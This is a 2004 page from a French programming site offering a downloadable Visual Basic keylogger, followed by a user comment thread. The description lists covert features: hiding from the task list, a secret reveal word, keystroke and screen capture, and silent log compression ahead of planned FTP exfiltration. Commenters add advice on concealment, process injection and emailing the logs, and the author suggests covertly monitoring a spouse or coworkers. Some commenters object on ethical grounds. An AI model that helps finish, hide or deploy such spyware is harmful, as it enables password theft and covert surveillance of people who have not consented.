begin process at 2012 02 11 09:36:46
  Trouver un code source :
 
dans
 
Accueil > 

Code

 > 

Sécurité

 > KEYLOGGER (28/10/2004)

KEYLOGGER (28/10/2004)


 Information sur la source

Note :
8 / 10 - par 11 personnes
8,00 / 10

  • 1

  • 2

  • 3

  • 4

  • 5

  • 6

  • 7

  • 8

  • 9

  • 10
Catégorie :Sécurité Niveau :Débutant Date de création :28/10/2004 Vu / téléchargé :17 878 / 3 551

Auteur : yannn

Ecrire un message privé
Commentaire sur cette source (24)
Ajouter un commentaire et/ou une note

 Description

Il y a quelques temps je me suis lancer dans la création d'un bon keylogger. Faute de temps j'avais du mettre de coté mon projet. Aujourdhui je peux le reprendre pour essayer de le terminer.
Voici la version alpha de mon nouveau keylogger.
Je l'ai programmé sous VB car, a ma grande surprise, un programme compilé en vb5 est plus rapide qu'en vb6.. ( allez savoir pourquoi ???). Bref, ce nouveau keylogger
-invisble  meme dans les processus en cours;
-il apparait lorsque l'utilisateur tape "montretoispy"
-enregistrer toutes les touches frappées par l'utilisateur;
-enregistre une zone proche du curseur de la souris a chaque fois que l'utilisateur clic gauche;
-l'ensemble des information enregistrées est rassemblé dans un répertoire (c:\windows\keyb\...) + la date du jour de l'enregistrement;
-supposons que vous étaigner votre ordinateur et que vous le redémarrez le mem jour, il poursuivra le log du jour sans effacer les données deja récoltées;
-au demarrage, il verifie s'il existe des log des jours précédents, s'il en existe, il les compresse en rar (de maniere invisible pour l'utilisateur)...

Vous voyez peut etre ou je veux en venir avec cette derniere fonction ...
Ben il me reste a implanter la fonction FTP... Je suis en train de plancher dessus mais un coup de main serait le bien venu !!!

Source

  • Essayez le, dite moi ce que vous en pensez.
Essayez le, dite moi ce que vous en pensez.

 Conclusion

Avan de lancer le prog, renommer rar.exe1 en rar.exe

 Fichier Zip

Les Membres Club peuvent télécharger directement un fichier contenu dans le zip sans télécharger le zip en entier !

Télécharger le zip


 Sources du même auteur

Source avec Zip UN INSTALLEUR DE PROGRAMMES
Source avec Zip Source avec une capture INSTALLEUR DE PROGRAMME
Source avec Zip Source avec une capture VISUALBASIC MEDIA CENTER
Source avec Zip WINDOWS MEDIA CENTER VISUALBASIC
Source avec Zip TELECOMMANDE PC + PORT.DLL

 Sources de la même categorie

Source avec Zip Source avec une capture Source .NET (Dotnet) CHIFFREMENT XOR PLUS ROBUSTE par dheroux
Source avec Zip CRYPTAGE MARANT par alpha5
Source avec Zip ACCÈS PAR MOT DE PASSE À FEUILLE EXCEL par mimiZanzan
Source avec Zip CRYPTER-DÉCRYPTER UN TEXTE - TEXTE CRYPTÉ UNIQUEMENT EN MAJ... par Saintache
Source avec Zip Source avec une capture FOLDER PROTECTION par hackoo

Commentaires et avis

Commentaire de BobTSMSI le 28/10/2004 10:03:17

Super ton prog ;)

Ça marche top... Pour savoir si des gens utilisent ton poste en ton absence, c'est pas mal. Mais faut pas s'en servir pour spy les mots de passe sur d'autres postes!!

Pour vraiment le planquer, il faudrait désactiver la loupe hors des instants de capture, parcequ'on voit qu'elle utilise un peu les ressources système... Un utilisateur méfiant s'en rendra vite compte.

Juste un truc pas super... Sous Windows 2000, moi je vois ton prog dans la liste des processus... Mais bon tu parlais sans doute de la fenêtre du Control+Alt+Suppr de Windows 98.

Malgrès ce dernier détail, je mets 10/10. :D

Commentaire de bouv le 28/10/2004 10:21:31

BobTSMSI>>Je n'ai pas 2000 mais je pense que le prog doirt apparaitrez dans la liste des services et non des processus. Merci de confirmer.

Commentaire de BruNews le 28/10/2004 10:31:36 administrateur CS

RegisterServiceProcess() n'existe plus depuis Win 2000, c'est a dire 5 ans deja.
La maniere de reellement planquer un prog est totalement hors de portee de VB.

Commentaire de BobTSMSI le 28/10/2004 10:45:13

Dans le gestionnaire de tâches, il apparait dans l'onglet "Applications" ainsi que dans l'ongler "Processus" comme n'importe quel autre programme.

Il faudrait trouver comment l'enregistrer dans la liste des services (celle des outils d'administration). Mais même là, je pense qu'on le verait...

Pour info, les services qu'on ne voit pas dans les processus sont ceux sous forme de dll qui sont chargés dans l'hote svhost.exe, c'est d'ailleur pour cela que ce dernier apparaît plusieurs fois car chaque instance de celui-ci héberge un certain nombre de services.

Commentaire de BobTSMSI le 28/10/2004 10:47:41

Oui, c'est bien ce que je pense BruNews, tu as raison.

Commentaire de crenaud76 le 28/10/2004 16:10:12

De toute façon, il faudra me dire quel est le réel intéret d'un keylogger si ce n'est pour faire de l'espionnage ou du hacking, ce qui est interdit -d'une manière général et sur ce site !- Ta source est peut-être intéressante par le code qu'elle renferme et les technologie que tu as du mettre en oeuvre dedans ! Mais excuses-moi !!! JE trouves cela nul !! Je ne te mettrais pas de note car je n'ai pas lu ta source !
Rien que le fait que tu tentes de masquer le process de ton programme à l'utilisateur me fait dire que cela s'apparente plus à du piratage qu'à du develloppement d'applications contructives ! Je suis déçu que des source de keylogger soit encore accepté sur le site de vbfrance !!

Commentaire de BobTSMSI le 28/10/2004 17:38:52

Vaste débat que tu ouvres là Crenaud...

Mais moi je préfère encore savoir comment planquer un prog ou comment récupérer les saisies clavier... Que de ne pas m'y intéresser de peur de la mauvaise utilisation que pourrait en faire tel ou tel utilisateur.

Ces comme les fabriquants de voitures qui font des voitures qui roulent à plus de 200km/h. La loi dit interdit de rouler au dessus de 130km/h sur autoroute. Après ça, si tu roules au dessus c'est ton problème, mais c'est pas celui du constructeur... Alors ne critique pas Yannn.

Commentaire de BruNews le 28/10/2004 17:59:06 administrateur CS

D'apres moi il n'y a pas a se tracasser a ce sujet, tout ceci releve du pur exercice mais reste impratiquable pour cause de langage. Tout ceci ne peut tourner qu'avec un setup complet et prend tellement de ressources que le 1er venu se rendrait compte du malaise. Sans compter la mise en invisible, hooker ZwQuerySystemInformation() de Ntdll.dll, encore jamais vu personne realiser cela en VB donc no problem, cette source peut rester.
Je verrai la meme chose sur asmfr correctement ecrit alors serait une autre histoire car la oui qu'il y aurait probleme.
Bonne continuation.

Commentaire de Dark_Shadow le 28/10/2004 18:35:39

Private Sub From1_Load()
AppTask.Visible = False
end sub

pour rendre le programme invisible dans la liste des taches, car chez moi les services sont integré (Xp pro) ds la liste des taches... alors que ca ca devrait vous l'enlever, en tout cas c'est un truc simple, qui marche, et qui peut vous simplifier la vie.
Vala sinon joli source, mais quand je tape "montretoispy" le prog n'apparait pas :/ dommage!
10/10 quand meme!!

Commentaire de yannn le 28/10/2004 20:01:10

Pour repondre à crenaud76,
J'ai créé ce keylogger a la base pour prouver a un collegue de travail, qui a mon sens prennait un peu la grosse tete en matiere d'informatique, qu'il n'etait pas aussi bon qu'il le croyait ! : "Personne n'est a l'abris d'un spyware !"
Donc effectivement a la base ce keylogger a bien pour but l"'espionnage" d'ou les process cachés et autres trucs.

Maintenant, j'ai repris ce programme parce que je n'etait pas satisfait de moi ( coté programmation et options). Donc finir ce keylogger etait pour moi juste un defit de programmation personnel !

La ou tu te goures, c'est qu'un keylloger peu avoir une grande utilité d'ailleur je l'ai installé sur mon PC (sans l'option sendlog) :
T'as jamais eu sous windows un gros plantage alors que tu venais de te taper une dissertation de 6 heures et que tu n'as pas sauvegarder ?
Ben un keylogger ca permet de pas avoir tout a te retaper !!!!!!!!! (grace au fichier log justement)
En plus de cacher les process, ca evite d'avoir tout un tas de fenetres windows ou dos qui souvrent pendant que tu bosses...

Avis a tous les programmeurs... ce keylogger n'est pas terminé : il manque l'option FTP: envoie des fichiers .rar sur un site FTP. Si vous avez un peu de temps a perdre... je serais ravis de lire vos sources sur le sujet !

Merci, Amicalement Yann

Commentaire de pseudobligatoire le 28/10/2004 22:06:06

Perso tu devrais rajouter l'option mail: envoi des logs par mail O_u  a partir d'une certaine taille des logs ou après X heures (valable pour le FTP ossi).
ptite note a Crenaud76: c'est parce qu'on tente de planquer un prog que ca y est c'est qu'on veut hack ou espionner quelqu'un. Et puis keylogger ne veut pas dire hack piratage ect.. enfin bon ca peut aider certaines personnes à apprendre alors faut arreter la paranoïa..

Commentaire de crenaud76 le 29/10/2004 09:22:21

Yann < JE n'ai effectivement jamais perdu 6h de travail à cause d'un plantage de Windows parce que :
1- Windows ne plante pas aussi souvent que cela.
2- La sauvegarde automatique sous Word, ca existe.

Pour ce qui est de ne pas avoir x fenetres qui bouche ton affichage, il suffit de mettre ton appli en tant que service. Plus de fenêtre, mais pas aussi "méchant" qu'un process totalement invisible.

Pour ce qui et de prouver à un tiers qu'il n'est pas aussi bon qu'il le pense, je suis d'accord, c''est un bon argument.

Je me suis moi-aussi amuser avec des trucs de ce genre, juste pour le fun : A l'époque ou j'avais un Atari, on s'amusait à dévellopper des virus (en ASM) et on se les refilait entre potes pour voir celui qui aurait fait le plus marrant (j'ai bien dis marrant ! Pas méchant !)

Et je ne suis pas contre la liberté d'expression, mais au nom de cette même liberté d'expression, au USA, il n'est pas interdit de tenir des propos négationistes ou racistes !! Le souci avec ta source, c'est que tu sais, toi pourquoi tu l'as fait, et si je devais m'en inspirer, ce serait sans aucun doute possible pour la bonne cause. Mais qu'en serait-il d'un "petit con" develloppeur trainant sur vbfrance ???

Commentaire de BobTSMSI le 29/10/2004 09:33:37

Je t'en pris Crénaud.....
On parle ici JUSTE d'un KeyLogger!
Pas de l'arme nucléaire...

Et perso, je pense que les USA ont raison de ne pas interdire les propos négationistes ou racistes... Il vaut mieux laisser s'exprimer ce genre d'idées afin de mieux les combattre plutôt que de les étouffer. Mais ça c'est un autre débat, je rappelle qu'on parle ici JUSTE d'un KeyLogger!

Commentaire de yannn le 29/10/2004 09:39:22

Je suis d'accord avec toi d'autant plus qu'il y'a un paquet de petit con cette année (un humoriste ironise meme en disant : y'a de plus en plus de cons chaque année ... mais je crois que les cons de l'année prochaine sont deja là !).
Maintenant on ne peut pas incriminer le concepteur sous pretexte que l'utilisateur utilise son programme de maniere a nuir ! Si non bonjour tout ce que se prendrait les concerpteurs du PEER TO PEER !
Un minimum de moral devrait suffir...

Et puis, faut pas jeter  la pierre ! qui sait si un jour, pour etre sur que ta femme ne n'a pasenvie d'aller voir ailleur, que ton frere n'utilise pas ton PC a ton insue, que tes collegues de travail n'utilisent pas ta session pour trainer sur des sites de cul...  qui sait si tu ne prendras pas mon petit programme pour verifier ?

Commentaire de crenaud76 le 29/10/2004 11:08:29

Pour clore le débat (que j'ai lancé !) je dirais simplement qu'il y à d'autre moyen d'empecher les collègues de se servir de ta session à ton insu : <Windows> + 'L' par exemple

Commentaire de BruNews le 29/10/2004 11:21:58 administrateur CS

crenaud76> c'est bien evident donc tel n'est pas le but mais bon... on ne va pas epiloguer la dessus.

Commentaire de benozor77 le 29/10/2004 12:03:06

Bonjour/Bonsoir,

Belle source.
La 'seule' façon pour ne pas le voir dans le CTRL + ALT + SUPPR serait de l'injecter dans un processus.

++
benozor77. :-)

Commentaire de yannn le 29/10/2004 12:25:32

Personne ne se sent d'attaque pour m'aider a finir ce keylogger ?
Je cale sur l'envoie FTP ou/et mail...

Commentaire de spy166 le 30/10/2004 02:47:08

Je t'aiderai volontier si c'était du .net (en plus ca serait trop facile), mais bon retourner à la préhistoire de vb6 non merci.

Commentaire de yannn le 30/10/2004 09:53:22

Pire encore c'est du VB5 ! :p

Commentaire de FeelCode le 30/10/2004 17:46:00

Bon ben y as ceux qui font les keyloguer et ceux qui les detecte :D celui que j'ai fait liste tou mai marche sous xp et peut être sous 98 dans sa prochaine vertion.

bref le vb ou  c ou le .net ou l'asm  ne change rien a l'intention de faire du piratage on peux tout faire  facilment pour foutre le bordel et meme sous linux. bref  sa existe et faut en tenire compte.
Bien que un language sois moin detectable car plus performant une simple ligne suffi en vb pour plenter un os.
la seul dificulter c est que le code malicieux doit être executer aux moin une fois et avec  pour but de ne pas ce faire detecter :)

mai sa fait "plaisire" de voir les moyen utiliser par le camp adversse  

enfin vb6 permai de faire les chose très rapidement quand on devloppe seul  en très peux de temps donc evidament moin performant et un peux plus rigide. mai a quoi sert un programe qui n'est pas fini ?

tout est relatif  le c c est bien puis que je m'y suis mi :) mai c est long  long lol

Commentaire de rabixpvb le 25/04/2005 19:05:47

exelent prog pour le transfert vers la base FTP reste plus k'a ajjouté un tit composant nommé "Inet" ou bein 1 tit winsock et tu envoie les donné par email .

Commentaire de kokorox le 04/06/2006 14:38:26

Bonjour a tous j'ai quelque problemes et enormément de questions sur ce keylogger car je suis etudiant en informatique et je m'interesse au visual basique.si des personne aurait le temps pour m'ajouter sur msn ou meme le createur pour m'eclairer sur pas mal de points sa serait vraiment super, j'ai quelque bases tout de meme et je pourrait essayer de t'aider yannn pour cette derniere otpions de FTP! voila merci au revoir mon adresse Mail/msn est koko94@free.fr

Commentaire de settura le 01/04/2010 02:07:31

Bonjour , quelqu'un peut me dire comment je fai pour voir le dossier contenant les information pris du kayloger svp / -il apparait lorsque l'utilisateur tape "montretoispy"( mai sa je le tape ou ) -_-' . et si aussi m'expliquer comme on fair pour le desinstaler merci de vautre aide .

 Ajouter un commentaire




Nos sponsors


Sondage...

Comparez les prix

CalendriCode

Février 2012
LMMJVSD
  12345
6789101112
13141516171819
20212223242526
272829    

Consulter la suite du CalendriCode

 
Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 1,794 sec (4)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales